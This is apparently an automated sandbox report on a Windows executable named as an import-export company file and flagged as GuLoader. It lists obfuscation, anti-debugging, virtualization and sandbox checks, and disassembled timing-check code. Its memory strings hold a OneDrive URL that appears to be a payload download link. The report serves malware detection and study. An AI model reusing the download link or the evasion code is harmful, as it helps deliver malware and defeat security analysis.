Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe File read: C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\desktop.ini
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe File read: C:\Windows\System32\drivers\etc\hosts (3 occurrences)
Source: unknown Process created: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe 'C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe'
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process created: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe 'C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe'
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4a04656d-52aa-49de-8a09-cb178760e748}\InProcServer32
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_00407A2B push esp; retf 1_2_00407A2C
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1636D push ebp; ret 1_2_03D163AB
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D10062 push esi; iretd 1_2_03D1008F
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D10005 push esi; iretd 1_2_03D1001D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOOPENFILEERRORBOX (6 occurrences)
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX (34 occurrences)
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process information set: NOGPFAULTERRORBOX Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D10F36 TerminateProcess,LoadLibraryA, 1_2_03D10F36
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19FD4 1_2_03D19FD4
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19FCE 1_2_03D19FCE
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19FF2 1_2_03D19FF2
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D111F5 TerminateProcess, 1_2_03D111F5
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D135F9 1_2_03D135F9
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D10BEC NtWriteVirtualMemory, 1_2_03D10BEC
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19FEC 1_2_03D19FEC
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1A18A 1_2_03D1A18A
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19D8D NtWriteVirtualMemory, 1_2_03D19D8D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D10F51 TerminateProcess, 1_2_03D10F51
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D11546 TerminateProcess, 1_2_03D11546
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1374E 1_2_03D1374E
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D10F77 TerminateProcess, 1_2_03D10F77
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D18F7D 1_2_03D18F7D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1131A TerminateProcess, 1_2_03D1131A
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D12B1E 1_2_03D12B1E
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D11107 TerminateProcess, 1_2_03D11107
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19D39 1_2_03D19D39
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19F3A 1_2_03D19F3A
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D134D3 1_2_03D134D3
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D19E75 1_2_03D19E75
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1347D NtWriteVirtualMemory, 1_2_03D1347D
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1141F TerminateProcess, 1_2_03D1141F
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D13827 1_2_03D13827
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe RDTSC instruction interceptor: First address: 0000000003D19586 second address: 0000000003D19586 instructions:
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe RDTSC instruction interceptor: First address: 0000000003D1B185 second address: 0000000003D1B185 instructions:
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe RDTSC instruction interceptor: First address: 0000000003D162DB second address: 0000000003D162DB instructions:
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe RDTSC instruction interceptor: First address: 0000000003D1A3AE second address: 0000000003D1A247 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov dword ptr [ebp+000001A5h], edx 0x00000010 cmp cx, ax 0x00000013 mov edx, F94DAB62h 0x00000018 xor edx, BD1A4B48h 0x0000001e xor edx, C6B15F47h 0x00000024 jmp 00007F0E0CF3DE02h 0x00000026 cmp si, 0F1Bh 0x0000002b sub edx, 82E5DE6Eh 0x00000031 cmp ah, bh 0x00000033 cmp word ptr [ebx+05h], dx 0x00000037 mov edx, dword ptr [ebp+000001A5h] 0x0000003d jne 00007F0E0CF3DDDCh 0x0000003f mov dword ptr [ebp+00000189h], ecx 0x00000045 mov ecx, CF26FC6Ch 0x0000004a xor ecx, 90037EF2h 0x00000050 test ax, dx 0x00000053 add ecx, B269DCB6h 0x00000059 cmp cl, al 0x0000005b add ecx, EE70C0ACh 0x00000061 nop 0x00000062 cmp dword ptr [ebp+00000189h], ecx 0x00000068 mov ecx, dword ptr [ebp+00000189h] 0x0000006e jne 00007F0E0CF3DA34h 0x00000074 inc ecx 0x00000075 inc ebx 0x00000076 mov dword ptr [ebp+0000017Dh], ecx 0x0000007c mov ecx, 3E44CBEFh 0x00000081 xor ecx, B436F885h 0x00000087 add ecx, 0943E9D7h 0x0000008d xor ecx, 0326DE11h 0x00000093 test bl, FFFFFFE4h 0x00000096 cmp dword ptr [ebx], ecx 0x00000098 mov ecx, dword ptr [ebp+0000017Dh] 0x0000009e jne 00007F0E0CF3DE36h 0x000000a4 mov dword ptr [ebp+00000171h], edi 0x000000aa mov edi, dword ptr [ebx] 0x000000ac cmp edx, edi 0x000000ae mov edi, dword ptr [ebp+00000171h] 0x000000b4 jne 00007F0E0CF3DDB8h 0x000000b6 mov dword ptr [ebp+0000022Eh], eax 0x000000bc test ax, cx 0x000000bf mov eax, 90506750h 0x000000c4 test bx, bx 0x000000c7 pushad 0x000000c8 lfence 0x000000cb rdtsc
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe RDTSC instruction interceptor: First address: 0000000003D15953 second address: 0000000003D15953 instructions:
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe RDTSC instruction interceptor: First address: 000000000056392D second address: 000000000056392D instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp dx, bx 0x0000000d sub ecx, 45FB412Ah 0x00000013 cmp dword ptr [ebp+00000248h], ecx 0x00000019 mov ecx, dword ptr [ebp+00000248h] 0x0000001f jne 00007F0E0CA150EFh 0x00000021 mov byte ptr [eax+ecx-01h], FFFFFF9Ch 0x00000026 xor byte ptr [eax+ecx-01h], FFFFFFBEh 0x0000002b xor byte ptr [eax+ecx-01h], FFFFFFEAh 0x00000030 test ebx, eax 0x00000032 xor byte ptr [eax+ecx-01h], FFFFFFC8h 0x00000037 dec ecx 0x00000038 mov dword ptr [ebp+00000248h], ecx 0x0000003e test dl, 00000057h 0x00000041 mov ecx, B206E4FAh 0x00000046 add ecx, 638A09D6h 0x0000004c xor ecx, 506BAFFAh 0x00000052 pushad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe RDTSC instruction interceptor: First address: 00000000005642E1 second address: 00000000005642E1 instructions:
Tries to detect Any.run
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000001.00000002.604141789.0000000003D50000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000001.00000002.604141789.0000000003D50000.00000004.00000001.sdmp, KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1025972369.00000000006B0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1025972369.00000000006B0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=HTTPS://ONEDRIVE.LIVE.COM/DOWNLOAD?CID=7B0580AA0B18AE44&RESID=7B0580AA0B18AE44%21106&AUTHKEY=ANQAOZGBUZCFLEEWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe RDTSC instruction interceptor: First address: 0000000003D19586 second address: 0000000003D19586 instructions:
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe RDTSC instruction interceptor: First address: 0000000003D1B185 second address: 0000000003D1B185 instructions:
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe RDTSC instruction interceptor: First address: 0000000003D1A36A second address: 0000000003D1A381 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b xor edi, ED27E950h 0x00000011 pushad 0x00000012 mov eax, 000000C6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe RDTSC instruction interceptor: First address: 0000000003D162DB second address: 0000000003D162DB instructions:
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe RDTSC instruction interceptor: First address: 0000000003D1A3AE second address: 0000000003D1A247 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov dword ptr [ebp+000001A5h], edx 0x00000010 cmp cx, ax 0x00000013 mov edx, F94DAB62h 0x00000018 xor edx, BD1A4B48h 0x0000001e xor edx, C6B15F47h 0x00000024 jmp 00007F0E0CF3DE02h 0x00000026 cmp si, 0F1Bh 0x0000002b sub edx, 82E5DE6Eh 0x00000031 cmp ah, bh 0x00000033 cmp word ptr [ebx+05h], dx 0x00000037 mov edx, dword ptr [ebp+000001A5h] 0x0000003d jne 00007F0E0CF3DDDCh 0x0000003f mov dword ptr [ebp+00000189h], ecx 0x00000045 mov ecx, CF26FC6Ch 0x0000004a xor ecx, 90037EF2h 0x00000050 test ax, dx 0x00000053 add ecx, B269DCB6h 0x00000059 cmp cl, al 0x0000005b add ecx, EE70C0ACh 0x00000061 nop 0x00000062 cmp dword ptr [ebp+00000189h], ecx 0x00000068 mov ecx, dword ptr [ebp+00000189h] 0x0000006e jne 00007F0E0CF3DA34h 0x00000074 inc ecx 0x00000075 inc ebx 0x00000076 mov dword ptr [ebp+0000017Dh], ecx 0x0000007c mov ecx, 3E44CBEFh 0x00000081 xor ecx, B436F885h 0x00000087 add ecx, 0943E9D7h 0x0000008d xor ecx, 0326DE11h 0x00000093 test bl, FFFFFFE4h 0x00000096 cmp dword ptr [ebx], ecx 0x00000098 mov ecx, dword ptr [ebp+0000017Dh] 0x0000009e jne 00007F0E0CF3DE36h 0x000000a4 mov dword ptr [ebp+00000171h], edi 0x000000aa mov edi, dword ptr [ebx] 0x000000ac cmp edx, edi 0x000000ae mov edi, dword ptr [ebp+00000171h] 0x000000b4 jne 00007F0E0CF3DDB8h 0x000000b6 mov dword ptr [ebp+0000022Eh], eax 0x000000bc test ax, cx 0x000000bf mov eax, 90506750h 0x000000c4 test bx, bx 0x000000c7 pushad 0x000000c8 lfence 0x000000cb rdtsc
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe RDTSC instruction interceptor: First address: 0000000003D15953 second address: 0000000003D15953 instructions:
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe RDTSC instruction interceptor: First address: 000000000056A36A second address: 000000000056A381 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b xor edi, ED27E950h 0x00000011 pushad 0x00000012 mov eax, 000000C6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe RDTSC instruction interceptor: First address: 000000000056392D second address: 000000000056392D instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp dx, bx 0x0000000d sub ecx, 45FB412Ah 0x00000013 cmp dword ptr [ebp+00000248h], ecx 0x00000019 mov ecx, dword ptr [ebp+00000248h] 0x0000001f jne 00007F0E0CA150EFh 0x00000021 mov byte ptr [eax+ecx-01h], FFFFFF9Ch 0x00000026 xor byte ptr [eax+ecx-01h], FFFFFFBEh 0x0000002b xor byte ptr [eax+ecx-01h], FFFFFFEAh 0x00000030 test ebx, eax 0x00000032 xor byte ptr [eax+ecx-01h], FFFFFFC8h 0x00000037 dec ecx 0x00000038 mov dword ptr [ebp+00000248h], ecx 0x0000003e test dl, 00000057h 0x00000041 mov ecx, B206E4FAh 0x00000046 add ecx, 638A09D6h 0x0000004c xor ecx, 506BAFFAh 0x00000052 pushad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe RDTSC instruction interceptor: First address: 00000000005642E1 second address: 00000000005642E1 instructions:
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Code function: 1_2_03D1611B rdtsc 1_2_03D1611B
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe TID: 6988 Thread sleep count: 205 > 30
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe TID: 7032 Thread sleep time: -60000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Thread delayed: delay time: 60000
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000001.00000002.604141789.0000000003D50000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000001.00000002.604141789.0000000003D50000.00000004.00000001.sdmp, KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1025972369.00000000006B0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: KHAWATMI CO.IMPORT & EXPORT.exe, 00000018.00000002.1025972369.00000000006B0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=https://onedrive.live.com/download?cid=7B0580AA0B18AE44&resid=7B0580AA0B18AE44%21106&authkey=ANqAOzgBuZcfleEwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe System information queried: ModuleInformation

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Thread information set: HideFromDebugger
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
